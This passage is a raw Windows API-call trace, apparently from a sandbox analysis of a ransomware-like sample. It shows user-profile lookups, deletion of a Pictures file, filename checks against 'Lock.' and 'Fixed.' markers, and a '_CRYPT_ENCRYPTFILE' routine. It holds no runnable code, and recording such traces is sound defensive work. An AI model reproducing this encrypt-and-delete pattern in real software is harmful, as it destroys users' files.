hHeap=0x970000) returned 1 [0255.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0255.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0255.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0255.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0255.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0255.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0255.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0255.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0255.445] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.446] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0255.446] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0255.446] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Th2s_hnP9cJx5.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Th2s_hnP9cJx5.bmp", lpFilePart=0x8cedf4*="Th2s_hnP9cJx5.bmp") returned 0x2a [0255.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0255.446] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Th2s_hnP9cJx5.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\th2s_hnp9cjx5.bmp")) returned 0x20 [0255.447] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Th2s_hnP9cJx5.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5679540, ftCreationTime.dwHighDateTime=0x1d5f06b, ftLastAccessTime.dwLowDateTime=0x44781320, ftLastAccessTime.dwHighDateTime=0x1d5ec01, ftLastWriteTime.dwLowDateTime=0x44781320, ftLastWriteTime.dwHighDateTime=0x1d5ec01, nFileSizeHigh=0x0, nFileSizeLow=0x3ad6, dwReserved0=0x1, dwReserved1=0x1c, cFileName="Th2s_hnP9cJx5.bmp", cAlternateFileName="TH2S_H~1.BMP")) returned 0xa87590 [0255.447] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Th2s_hnP9cJx5.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\th2s_hnp9cjx5.bmp")) returned 1 [0255.543] FindNextFileW (in: hFindFile=0xa87590, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5679540, ftCreationTime.dwHighDateTime=0x1d5f06b, ftLastAccessTime.dwLowDateTime=0x44781320, ftLastAccessTime.dwHighDateTime=0x1d5ec01, ftLastWriteTime.dwLowDateTime=0x44781320, ftLastWriteTime.dwHighDateTime=0x1d5ec01, nFileSizeHigh=0x0, nFileSizeLow=0x3ad6, dwReserved0=0x1, dwReserved1=0x1c, cFileName="Th2s_hnP9cJx5.bmp", cAlternateFileName="TH2S_H~1.BMP")) returned 0 [0255.543] FindClose (in: hFindFile=0xa87590 | out: hFindFile=0xa87590) returned 1 [0255.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0255.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0255.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0255.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0255.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0255.544] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0255.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0255.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0255.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0255.544] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0255.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0255.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0255.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0255.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0255.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0255.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0255.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0255.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0255.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0255.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0255.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0255.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0255.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0255.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0255.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0255.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0255.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0255.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0255.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0255.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0255.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0255.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x56) returned 0x2e58910 [0255.545] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Th2s_hnP9cJx5.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Th2s_hnP9cJx5.bmp", lpFilePart=0x8cf650*="Th2s_hnP9cJx5.bmp") returned 0x2a [0255.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0255.545] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Th2s_hnP9cJx5.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\th2s_hnp9cjx5.bmp")) returned 0xffffffff [0255.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0255.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0255.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0255.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0255.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0255.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0255.545] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0255.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0255.545] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0255.545] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0255.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0255.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0255.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0255.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0255.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0255.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0255.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0255.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0255.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0255.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0255.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0255.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0255.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="thpKc0ZlnbdGnIRJzL.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hpKc0ZlnbdGnIRJzL.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pKc0ZlnbdGnIRJzL.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kc0ZlnbdGnIRJzL.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c0ZlnbdGnIRJzL.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZlnbdGnIRJzL.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZlnbdGnIRJzL.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lnbdGnIRJzL.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nbdGnIRJzL.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bdGnIRJzL.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dGnIRJzL.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GnIRJzL.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nIRJzL.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IRJzL.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RJzL.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JzL.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zL.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0255.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0255.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0255.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0255.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0255.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0255.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0255.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0255.547] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0255.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0255.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0255.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0255.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0255.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0255.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0255.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0255.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0255.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0255.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0255.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0255.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0255.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0255.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0255.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0255.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0255.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0255.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0255.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2e) returned 0x2e55ca8 [0255.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0255.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="thpKc0ZlnbdGnIRJzL.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hpKc0ZlnbdGnIRJzL.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pKc0ZlnbdGnIRJzL.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kc0ZlnbdGnIRJzL.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c0ZlnbdGnIRJzL.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0255.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZlnbdGnIRJzL.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0255.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZlnbdGnIRJzL.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lnbdGnIRJzL.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nbdGnIRJzL.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bdGnIRJzL.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0255.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dGnIRJzL.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0255.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GnIRJzL.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nIRJzL.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IRJzL.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RJzL.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JzL.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zL.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0255.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0255.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0255.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0255.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0255.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0255.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0255.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0255.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0255.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0255.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0255.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0255.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0255.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0255.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0255.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0255.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0255.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0255.549] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0255.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0255.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0255.549] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0255.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0255.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0255.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0255.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d88 [0255.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0255.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0255.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0255.549] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0255.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0255.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0255.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0255.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0255.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0255.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0255.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0255.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0255.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0255.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0255.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0255.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0255.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0255.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0255.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0255.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0255.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0255.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e28 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.550] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0255.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0255.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0255.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0255.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0255.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0255.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0255.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54eb8 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0255.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 